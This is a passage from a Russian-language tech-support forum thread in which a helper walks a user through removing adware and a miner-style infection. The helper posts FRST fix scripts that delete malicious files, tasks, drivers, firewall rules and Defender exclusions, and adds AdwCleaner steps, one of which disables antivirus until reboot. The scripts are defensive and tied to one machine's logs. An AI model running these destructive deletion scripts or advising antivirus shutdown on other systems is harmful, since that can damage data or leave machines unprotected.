  2019-07-18 01:48 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\MachinerData
  2019-07-18 01:47 - 2019-07-18 01:47 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\r5cphmyvv4n
  2019-07-18 01:29 - 2019-07-18 13:02 - 000002890 _____ C:\Windows\System32\Tasks\mrAArNosEtAJT2
  2019-07-18 01:28 - 2019-07-18 13:02 - 000002850 _____ C:\Windows\System32\Tasks\JSpPUlYEOjGQEpF2
  2019-07-18 01:28 - 2019-07-18 01:32 - 000000000 ____D C:\Program Files\NUYSL1VMVS
  2019-07-18 01:28 - 2019-07-18 01:28 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\g1qxn0urxz0
  2019-07-17 23:49 - 2019-07-17 23:49 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\ch51whag4gk
  2019-07-17 20:12 - 2019-07-17 20:12 - 000000000 ____D C:\Users\Все пользователи\AppxeetouQ
  2019-07-17 20:12 - 2019-07-17 20:12 - 000000000 ____D C:\ProgramData\AppxeetouQ
  2019-07-18 02:29 - 2019-02-17 02:38 - 000000000 ____D C:\Windows\System32\Tasks\WiseCleaner
  2019-07-15 15:11 - 2019-02-17 02:44 - 000000000 ____D C:\ProgramData\ProductData
  2019-07-17 19:56 - 2019-07-17 19:56 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\4qavsr3x335\w11b02mylic.exe
  2019-07-17 23:49 - 2019-07-17 23:49 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\ch51whag4gk\0azhp2m0ygx.exe
  2019-07-17 16:58 - 2019-07-17 16:58 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\crnof3twn1e\kevyn4knivc.exe
  2019-07-18 01:28 - 2019-07-18 01:28 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\g1qxn0urxz0\m4usqulpfrg.exe
  2019-07-18 12:42 - 2019-07-18 12:42 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\jclyrksahme\hemqvsph1fz.exe
  2019-07-18 13:02 - 2019-07-18 13:02 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\o4wnkfzf33c\3hxl4zyymnv.exe
  2019-07-17 16:24 - 2019-07-17 16:25 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\zu4amnvtgvr\254qbvv2tp4.exe
  2019-07-18 12:42 - 2019-07-18 12:42 - 001005568 _____ (1VYUW) [File not signed] C:\Program Files\CZLZVGPLWK\CZLZVGPLW.exe
  2019-07-18 13:02 - 2019-07-18 13:02 - 001005568 _____ (1VYUW) [File not signed] C:\Program Files\KACSYMBLU9\KACSYMBLU.exe
  AlternateDataStreams: C:\ProgramData:NT [40]
  AlternateDataStreams: C:\ProgramData:NT2 [672]
  AlternateDataStreams: C:\Users\All Users:NT [40]
  AlternateDataStreams: C:\Users\All Users:NT2 [672]
  AlternateDataStreams: C:\Users\Все пользователи:NT [40]
  AlternateDataStreams: C:\Users\Все пользователи:NT2 [672]
  AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
  AlternateDataStreams: C:\ProgramData\Application Data:NT2 [672]
  AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
  AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [672]
  AlternateDataStreams: C:\Users\Все пользователи\Application Data:NT [40]
  AlternateDataStreams: C:\Users\Все пользователи\Application Data:NT2 [672]
  AlternateDataStreams: C:\Users\Все пользователи\MTA San Andreas All:NT [40]
  AlternateDataStreams: C:\Users\Все пользователи\MTA San Andreas All:NT2 [672]
  AlternateDataStreams: C:\Users\Компауктер\Application Data:NT [40]
  AlternateDataStreams: C:\Users\Компауктер\Application Data:NT2 [672]
  AlternateDataStreams: C:\Users\Компауктер\AppData\Roaming:NT [40]
  AlternateDataStreams: C:\Users\Компауктер\AppData\Roaming:NT2 [672]
  MSCONFIG\startupreg: 1199918 => "C:\Users\Компауктер\AppData\Roaming\g50vfje1sxm\kw2oujfetig.exe" /VERYSILENT
  MSCONFIG\startupreg: 7408991 => "C:\Users\AD35~1\AppData\Local\Temp\is-D57PA.tmp\Quaturnion.exe" /VERYSILENT
  MSCONFIG\startupreg: App => 
  MSCONFIG\startupreg: M1EL7DP7TFB4IWX => "C:\Program Files\GV2XUUQ3YK\GV2XUUQ3Y.exe"
  FirewallRules: [{FB5A14E1-04D2-4CEE-A479-F9D0F041499A}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\DriverBooster.exe No File
  FirewallRules: [{729D7CE2-0A8F-481C-9EAD-416651D2C2B2}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\DriverBooster.exe No File
  FirewallRules: [{63BD42EC-C9A8-4A5E-A1AC-969747C9267B}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\DBDownloader.exe No File
  FirewallRules: [{B1094B8F-D703-466E-8417-82510E712F46}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\DBDownloader.exe No File
  FirewallRules: [{63460EDA-4745-45E6-8B5C-BF1EFE08E203}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\AutoUpdate.exe No File
  FirewallRules: [{129D4C2A-2AED-4237-ACD5-7D60625F594C}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\AutoUpdate.exe No File
  FirewallRules: [{817F3311-789D-4731-B1C5-197701BE0F59}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
  FirewallRules: [{2CF5048C-65B0-4D16-A2BD-FAD205FAC702}] => (Allow) C:\Users\Компауктер\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
  FirewallRules: [{2FA76B23-FC7F-4FB9-9D51-693C1EDC089F}] => (Allow) C:\Users\Компауктер\AppData\Local\Temp\csrss\lsa64.exe No File
  FirewallRules: [{A2299063-532E-407A-85F9-8A7D957B79AE}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
  FirewallRules: [{36FA02A3-85F3-44EE-B5E8-26EF6D6DC4FB}] => (Allow) C:\Users\Компауктер\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
  FirewallRules: [{9215F551-7558-4FD7-99FA-E1510C569A05}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
  FirewallRules: [{82AF2ECB-DB19-4F36-B8C5-24086FA7ADBE}] => (Allow) C:\Users\Компауктер\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
  FirewallRules: [{10B37ED2-AD39-4631-85DF-C8CAA33D8F89}] => (Allow) C:\Users\Компауктер\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
  FirewallRules: [{E83CD806-C03A-47FE-A1EA-53EE6E86272D}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
  ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
  EmptyTemp:
  Reboot:
  End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

[shutg]

я удалял, само опять

По-прежнему в списке установленных
Удалите принудительно.

 

[Sandor]

Еще один скрипт, пожалуйста.

• Отключите до перезагрузки антивирус.
• Выделите следующий код:
  

  Start::
  CreateRestorePoint:
  DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|csrss.exe
  DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|cloudnet.exe
  DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|windefender.exe
  Reboot:
  End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

[shutg]

вот

 

[Sandor]

Удалите старые отчеты FRST.txt и Addition.txt и соберите свежие (инструкция в сообщении №6)

 

[shutg]

Есть прогресс, реклама не выскакивает..

 

[Sandor]

Судя по логам, значительно лучше. Ещё кое-что подчистим.

• Отключите до перезагрузки антивирус.
• Выделите следующий код:
  

  Start::
  CreateRestorePoint:
  Task: {4F0A3FA6-863C-4334-90BA-BDA2BEDC20B5} - \mrAArNosEtAJT2 -> No File <==== ATTENTION
  BHO: YoutubeAdBlock -> {7F5C0C11-7E68-4D65-868E-AE2BE9EEB44E} -> C:\Program Files (x86)\vONNFjhTKIE\tl6Js7s.dll => No File
  BHO-x32: YoutubeAdBlock -> {7F5C0C11-7E68-4D65-868E-AE2BE9EEB44E} -> C:\Program Files (x86)\vONNFjhTKIE\k5C7RZn.dll => No File
  FF NewTab: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.NT
  R1 27dc587942c7edb8; C:\Windows\system32\drivers\27dc587942c7edb8.sys [30912 2019-07-17] (BlockChain Advances Ltd -> FsFilter Network)
  S1 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X]
  2019-07-18 12:45 - 2019-07-18 12:45 - 001435136 ____H C:\Windows\windefender.exe
  2019-07-18 12:44 - 2019-07-18 12:44 - 000023272 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\WinmonFS.sys
  2019-07-18 12:44 - 2019-07-18 12:44 - 000009352 _____ C:\Windows\system32\Drivers\Winmon.sys
  2019-07-17 19:56 - 2019-07-18 14:35 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\4qavsr3x335
  2019-07-17 16:58 - 2019-07-18 14:35 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\crnof3twn1e
  2019-07-17 16:08 - 2019-07-17 16:08 - 000000128 _____ C:\ProgramData\appdata.dat
  2019-07-17 16:05 - 2019-07-17 16:05 - 000030912 _____ (FsFilter Network) C:\Windows\system32\Drivers\27dc587942c7edb8.sys
  2019-07-17 16:04 - 2019-07-18 13:22 - 000000000 ____D C:\Program Files (x86)\Sending
  2019-07-17 16:03 - 2019-07-18 13:24 - 000000000 ___HD C:\Windows\rss
  Reboot:
  End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Затем:

• Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
• Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
• Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt (где x - любая цифра).
• Прикрепите отчет к своему следующему сообщению.

Подробнее читайте в этом руководстве.

 

[shutg]

Когда делал в FRST, программа переставала отвечать, приходилось перезагружать самостоятельно

 

[Sandor]

AdwCleaner[C00].txt - этот тоже покажите

 

[shutg]

.

 

[Sandor]

Еще раз:

• Запустите повторно AdwCleaner (by Malwarebytes) (программу необходимо запускать через правую кн. мыши от имени администратора).
• В меню Настройки включите дополнительно в разделе Базовые действия:
  • Сбросить политики IE
  • Сбросить политики Chrome
• В меню Панель управления нажмите Сканировать.
• По окончании нажмите кнопку Очистить и восстановить и дождитесь окончания удаления.
• Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt (где x - любая цифра).
• Прикрепите отчет к своему следующему сообщению

Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

Подробнее читайте в этом руководстве.

 

[shutg]

.

 

[akok]

Что с проблемой?